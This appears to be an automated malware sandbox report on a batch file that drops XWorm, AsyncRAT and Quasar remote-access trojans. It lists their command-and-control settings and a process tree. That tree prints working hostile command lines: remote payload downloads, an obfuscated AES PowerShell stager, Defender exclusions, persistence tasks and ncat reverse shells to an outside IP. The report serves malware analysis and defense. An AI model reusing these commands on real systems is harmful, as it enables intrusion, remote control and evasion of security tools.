Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-07-2024 22:41
Static task: static1
General
Target: 4Xc1zTf.bat
Size: 313B
MD5: 83b90daf2dc1611ccacd57f90a9e7dcd
SHA1: bcc229dcfe50608ada43b87105e423f88deb09f3
SHA256: 3598bd743d78bb85de33127f0584f9d37d0775fa5166b721b153deeeea0c172b
SHA512: 1aadf9c3cf7e540e09929bb9b834af192d9edc7196c6e44e4d77f8df2d26404509381306bcbd405d86dd47df403a375220b097aa7fd05162422c1dd594df3778
Malware Config
Extracted: quasar
  reconnect_delay: 3000
Extracted: xworm
  super-nearest.gl.at.ply.gg:17835
  best-bird.gl.at.ply.gg:27196
  wiz.bounceme.net:6000
Extracted: asyncrat
  Default
  finally-grande.gl.at.ply.gg:25844
  delay: 1
  install: false
  install_folder: %AppData%
Extracted: quasar
  3.1.5
  Slave
  stop-largely.gl.at.ply.gg:27116
  $Sxr-kl1r656AGsPQksTmi8
  encryption_key: CjDCAPF1JiLswgFipef3
  install_name: $77Client.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Windows Start-Up Application
  subdirectory: $77
Signatures
Detect Xworm Payload (5 IoCs)
Processes:
  resource | yara_rule
  behavioral1/memory/2796-72-0x000002B3CDD80000-0x000002B3CDD9A000-memory.dmp | family_xworm
  C:\Users\Admin\AppData\Local\Temp\7zip.exe | family_xworm
  behavioral1/memory/2652-111-0x0000000000E90000-0x0000000000EA6000-memory.dmp | family_xworm
  behavioral1/memory/2652-234-0x000000001C980000-0x000000001C98E000-memory.dmp | family_xworm
  behavioral1/memory/4476-385-0x000001EBA93C0000-0x000001EBA93D6000-memory.dmp | family_xworm
Quasar payload (3 IoCs)
Processes:
  resource | yara_rule
  behavioral1/memory/5020-34-0x0000014977DB0000-0x0000014978884000-memory.dmp | family_quasar
  C:\Users\Admin\AppData\Local\Temp\wininit.exe | family_quasar
  behavioral1/memory/3224-112-0x0000000000F40000-0x0000000000FAC000-memory.dmp | family_quasar
Async RAT payload (1 IoC)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\conhost.exe | family_asyncrat
Blocklisted process makes network request (7 IoCs)
Processes:
  flow | pid | process
  15 | 2556 | powershell.exe
  17 | 2556 | powershell.exe
  55 | 2796 | powershell.exe
  79 | 2796 | powershell.exe
  107 | 2796 | powershell.exe
  108 | 4476 | powershell.exe
  110 | 4476 | powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 12 IoCs)
Powershell Invoke Web Request.
Processes:
  pid | process
  2556 | powershell.exe
  5020 | powershell.exe
  3164 | powershell.exe
  2796 | powershell.exe
  4476 | powershell.exe
  4784 | powershell.exe
  816 | powershell.exe
  1412 | powershell.exe
  2720 | powershell.exe
  4480 | powershell.exe
  5084 | powershell.exe
  2424 | powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | 7zip.exe
Drops startup file (2 IoCs)
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | powershell.exe
Executes dropped EXE (18 IoCs)
Processes:
  pid | process
  2652 | 7zip.exe
  3224 | wininit.exe
  1588 | conhost.exe
  2516 | WinRunner.exe
  2240 | ncat.exe
  4504 | ncat.exe
  1612 | ncat.exe
  1652 | ncat.exe
  5044 | ncat.exe
  3988 | ncat.exe
  3816 | ncat.exe
  1716 | ncat.exe
  4420 | ncat.exe
  4172 | ncat.exe
  1576 | ncat.exe
  1920 | ncat.exe
  4044 | ncat.exe
  2356 | ncat.exe
Loads dropped DLL (30 IoCs)
Processes (pid | process | entries):
  2240 | ncat.exe | 3
  4504 | ncat.exe | 2
  1612 | ncat.exe | 2
  1652 | ncat.exe | 2
  5044 | ncat.exe | 2
  3988 | ncat.exe | 2
  3816 | ncat.exe | 2
  1716 | ncat.exe | 2
  4420 | ncat.exe | 2
  4172 | ncat.exe | 2
  1576 | ncat.exe | 3
  1920 | ncat.exe | 2
  4044 | ncat.exe | 2
  2356 | ncat.exe | 2
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinRunner.exe" | WinRunner.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Admin\\AppData\\Roaming\\powershell.exe" | powershell.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  52 | ip-api.com
Drops file in System32 directory (3 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\Tasks\powershell | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Modifies data under HKEY_USERS (1 IoC)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Modifies registry class (1 IoC)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | powershell.exe
Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  2908 | schtasks.exe
  4848 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid | process | entries):
  2556 | powershell.exe | 2
  5020 | powershell.exe | 4
  3164 | powershell.exe | 2
  2796 | powershell.exe | 4
  396 | powershell.exe | 2
  4480 | powershell.exe | 3
  5084 | powershell.exe | 3
  4784 | powershell.exe | 3
  2424 | powershell.exe | 3
  2652 | 7zip.exe | 2
  4424 | powershell.exe | 3
  2052 | powershell.exe | 3
  1248 | powershell.exe | 3
  696 | powershell.exe | 3
  2964 | powershell.exe | 3
  856 | powershell.exe | 3
  316 | powershell.exe | 3
  748 | powershell.exe | 2
  1212 | powershell.exe | 2
  3828 | powershell.exe | 2
  1832 | powershell.exe | 2
  4476 | powershell.exe | 7
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2556 | powershell.exe
  Token: SeDebugPrivilege | 5020 | powershell.exe
  Token: SeDebugPrivilege | 3164 | powershell.exe
  The remaining 61 entries all belong to pid 3164 powershell.exe, which cycles through the following token set three times (the third pass ends at token 34):
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
  pid | process
  3224 | wininit.exe
  2796 | powershell.exe
  2652 | 7zip.exe
  4476 | powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid process -> target pid process | entries):
  3880 cmd.exe -> 2556 powershell.exe | 2
  3880 cmd.exe -> 5104 curl.exe | 2
  3880 cmd.exe -> 2136 cmd.exe | 2
  3880 cmd.exe -> 5020 powershell.exe | 2
  5020 powershell.exe -> 3164 powershell.exe | 2
  5020 powershell.exe -> 1088 WScript.exe | 2
  1088 WScript.exe -> 3744 cmd.exe | 2
  3744 cmd.exe -> 2384 cmd.exe | 2
  3744 cmd.exe -> 2796 powershell.exe | 2
  2796 powershell.exe -> 2652 7zip.exe | 2
  2796 powershell.exe -> 3224 wininit.exe | 3
  2796 powershell.exe -> 1588 conhost.exe | 2
  2796 powershell.exe -> 2516 WinRunner.exe | 2
  2516 WinRunner.exe -> 1044 cmd.exe | 2
  1044 cmd.exe -> 2240 ncat.exe | 3
  2240 ncat.exe -> 396 powershell.exe | 3
  2796 powershell.exe -> 4480 powershell.exe | 2
  2652 7zip.exe -> 5084 powershell.exe | 2
  3224 wininit.exe -> 4848 schtasks.exe | 3
  2796 powershell.exe -> 2424 powershell.exe | 2
  2652 7zip.exe -> 4784 powershell.exe | 2
  1044 cmd.exe -> 4504 ncat.exe | 3
  4504 ncat.exe -> 4424 powershell.exe | 3
  1044 cmd.exe -> 1612 ncat.exe | 3
  1612 ncat.exe -> 2052 powershell.exe | 3
  1044 cmd.exe -> 1652 ncat.exe | 3
  1652 ncat.exe -> 1248 powershell.exe | 3
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented by process-tree depth)
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k RPCSS -p
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
[depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
[depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
[depth 1] C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  [depth 2] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4Xc1zTf.bat"
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -Command "Invoke-WebRequest -Uri https://github.com/ReaImastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat -OutFile libuac.dll.bat"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\curl.exe
      cmdline: curl -o libuca.dll.bat https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat
    [depth 3] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_249_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [depth 4] C:\Windows\System32\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat" "
          - Suspicious use of WriteProcessMemory
          [depth 6] C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            [depth 7] C:\Users\Admin\AppData\Local\Temp\7zip.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\7zip.exe"
              - Checks computer location settings
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
            [depth 7] C:\Users\Admin\AppData\Local\Temp\wininit.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\SysWOW64\schtasks.exe
                cmdline: "schtasks" /create /tn "Windows Start-Up Application" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f
                - Scheduled Task/Job: Scheduled Task
            [depth 7] C:\Users\Admin\AppData\Local\Temp\WinRunner.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\SYSTEM32\cmd.exe
                cmdline: "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\$TMP~.bat"
                - Suspicious use of WriteProcessMemory
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Suspicious use of WriteProcessMemory
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Suspicious use of WriteProcessMemory
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Suspicious use of WriteProcessMemory
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Suspicious use of WriteProcessMemory
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
                    - Suspicious behavior: EnumeratesProcesses
                [depth 9] C:\Users\Admin\AppData\Local\Temp\ncat.exe
                  cmdline: C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
                  - Executes dropped EXE
                  - Loads dropped DLL
                  [depth 10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: powershell
            [depth 7] C:\Users\Admin\AppData\Local\Temp\conhost.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
              - Executes dropped EXE
            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
